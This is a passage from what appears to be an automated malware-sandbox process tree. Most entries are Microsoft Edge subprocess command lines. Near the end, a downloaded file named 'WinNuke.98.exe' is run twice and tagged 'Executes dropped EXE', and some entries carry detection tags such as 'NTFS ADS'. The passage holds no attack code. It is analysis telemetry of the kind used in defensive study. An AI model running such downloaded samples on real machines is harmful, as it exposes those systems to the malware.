  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1752 /prefetch:1
  2⤵
  PID:2204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5252 /prefetch:8
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
  2⤵
  PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6360 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6820 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:3260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6340 /prefetch:8
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7816 /prefetch:1
  2⤵
  PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:1
  2⤵
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:1
  2⤵
  PID:2500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7856 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7924 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:1
  2⤵
  PID:2512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7936 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:1
  2⤵
  PID:5188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:1
  2⤵
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8952 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
  2⤵
  PID:5376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8556 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:1
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8784 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8512 /prefetch:1
  2⤵
  PID:680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9548 /prefetch:1
  2⤵
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9568 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10184 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9620 /prefetch:1
  2⤵
  PID:6756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1
  2⤵
  PID:7036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7944 /prefetch:1
  2⤵
  PID:6776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9656 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9832 /prefetch:1
  2⤵
  PID:6256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10492 /prefetch:1
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8912 /prefetch:1
  2⤵
  PID:6084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9672 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6516
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  PID:6508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10780 /prefetch:8
  2⤵
  - NTFS ADS
  PID:6960
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10464 /prefetch:1
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10776 /prefetch:1
  2⤵
  PID:6836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10716 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
